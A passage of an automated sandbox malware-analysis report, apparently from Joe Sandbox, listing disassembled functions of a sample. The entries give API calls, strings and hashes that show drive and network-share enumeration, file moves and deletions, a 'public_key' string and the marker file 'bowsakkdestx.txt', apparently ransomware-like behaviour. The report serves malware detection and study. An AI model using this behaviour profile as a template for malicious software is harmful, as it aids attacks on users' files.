                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                                                                                                                                                        • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                                                                                        • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                                                                                                        • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                                                                                        • Opcode ID: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                                                                                                                                                                                                                                        • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                                                                                        • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                                                        • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00410C4C
                                                                                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                                                                                        • Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                                                                                                                                                        • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                                                                                        • Opcode ID: 87dcb45450e60af98b52210476f258dab1abb410541903fbe05622d9d080ebfa
                                                                                                                                                                                                                                        • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87dcb45450e60af98b52210476f258dab1abb410541903fbe05622d9d080ebfa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                                        • API String ID: 3074076210-2104205924
                                                                                                                                                                                                                                        • Opcode ID: 0c8b0a76149b0de95293e1f4cc45ac03ebe51a13254a69568e9114975cd029d6
                                                                                                                                                                                                                                        • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c8b0a76149b0de95293e1f4cc45ac03ebe51a13254a69568e9114975cd029d6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                                                                                        • Opcode ID: d37722a339e8ed15ccae530704db98a2c84ed12c53e28ca473a2ad4616829cbe
                                                                                                                                                                                                                                        • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d37722a339e8ed15ccae530704db98a2c84ed12c53e28ca473a2ad4616829cbe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                                                                                                                                                          • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                                                                                                          • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                                                                                                                          • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                                                                                        • Opcode ID: ef263e89fa70d87f725eb6e31283b323a0408204ca80eca38d35ad4e6f6cf687
                                                                                                                                                                                                                                        • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef263e89fa70d87f725eb6e31283b323a0408204ca80eca38d35ad4e6f6cf687
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00413A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A
                                                                                                                                                                                                                                          • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                                                                                        • API String ID: 657562460-3788999226
                                                                                                                                                                                                                                        • Opcode ID: daa69fa18920ac11806db4f6f84afd25c52d14e8b0df8e8015d1942a6fb10681
                                                                                                                                                                                                                                        • Instruction ID: 58ba692ce99c870a1dcba0d104e91e6c126768a8e2c2fae69a1ad948a11fc536
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: daa69fa18920ac11806db4f6f84afd25c52d14e8b0df8e8015d1942a6fb10681
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F401F171200705ABD720CFACC09068BFBE8AF80725F20853FEA5583381EBB5E944C784
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2799698630-0
                                                                                                                                                                                                                                        • Opcode ID: 709df60532502dc37342ef2d7862b4ed522cd428f287debc262a40a36955420a
                                                                                                                                                                                                                                        • Instruction ID: 5ab157793dcca273c0e587975c0a14bd2b460513ddb2d20d8000ed9fb441c990
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 709df60532502dc37342ef2d7862b4ed522cd428f287debc262a40a36955420a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30519D70D00219DAEF20DF60DD457DEBBB5BF15308F4040BAD40A66291EB7A9AC9CF5A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00423A38 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                                                        • __lock_file.LIBCMT ref: 00423A7D
                                                                                                                                                                                                                                          • Part of subcall function 00420E53: __lock.LIBCMT ref: 00420E76
                                                                                                                                                                                                                                        • __fclose_nolock.LIBCMT ref: 00423A88
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                                                                                                                        • Opcode ID: f0a3a0ce50a01bd69e50a122e6036715185cc1a341e54edb0f2d040e7ec5a48c
                                                                                                                                                                                                                                        • Instruction ID: e9f7363e2c125346a9344b83ccdc7017391740cbbddd1805e0fe7159b8e2b74d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0a3a0ce50a01bd69e50a122e6036715185cc1a341e54edb0f2d040e7ec5a48c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EF0F631B01724AAD710AF66680275E6AB46F00339F90815FE4A09A1C1CB7C87428F59
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004118C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004118DD
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004118E9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2443081362-0
                                                                                                                                                                                                                                        • Opcode ID: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                                                                                                                                                        • Instruction ID: a75cf17640dcbe18a091e0aebb8a692561bc66dfcc2ddf1384dfcaf55dfbf141
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1E08636B415049BC7209B99ECC0B9DB374F785720F20437AD919733D047352D028A58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00416950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
